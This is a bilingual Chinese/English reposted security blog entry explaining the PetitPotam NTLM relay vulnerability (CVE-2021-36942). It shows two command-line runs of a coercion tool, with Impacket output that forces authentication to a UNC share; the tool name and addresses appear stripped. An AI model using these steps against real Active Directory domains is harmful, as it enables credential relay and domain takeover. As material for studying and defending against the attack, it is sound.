PetitPotam漏洞是一个严重的安全缺陷,会影响Microsoft Windows操作系统的NTLM(NT LAN Manager)身份验证协议。此漏洞(跟踪为CVE-2021-36942)可允许攻击者执行中继攻击并危及身份验证过程,可能导致对Active Directory域中敏感资源的未经授权访问。

  • PetitPotam exploits the Windows operating system’s reliance on the NTLM authentication protocol for various security operations, such as authenticating users and computers in an Active Directory environment.
    PetitPotam利用Windows操作系统对NTLM身份验证协议的依赖来进行各种安全操作,例如在Active Directory环境中对用户和计算机进行身份验证。
  • Attackers can exploit this vulnerability by sending specially crafted RPC (Remote Procedure Call) requests to a domain controller, tricking it into initiating an authentication process with a remote attacker-controlled server.
  • Once the authentication process is initiated, the attacker can capture the NTLM authentication response and use it to perform a relay attack, potentially gaining unauthorized access to domain resources.

$ python3 -debug '' '\\\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Choosing random method
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\\\share\\foo'
[*] Success!

Specific Method: 具体方法:

$ python3 -debug -method AddUsersToFile '' '\\\share\foo'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[+] Connecting to 'ncacn_np:[\\PIPE\\lsarpc]'
[+] Connected to 'ncacn_np:[\\PIPE\\lsarpc]'
[+] Binding to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[+] Bound to ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
[*] Using method: AddUsersToFile
[*] Coercing authentication to: '\\\\\\share\\foo'
[*] Success!

Reference  参考

原文始发于hadess:Pwning the Domain: Credentialess/Username

版权声明:admin 发表于 2024年2月16日 上午9:29。
转载请注明:Pwning the Domain: Credentialess/Username | CTF导航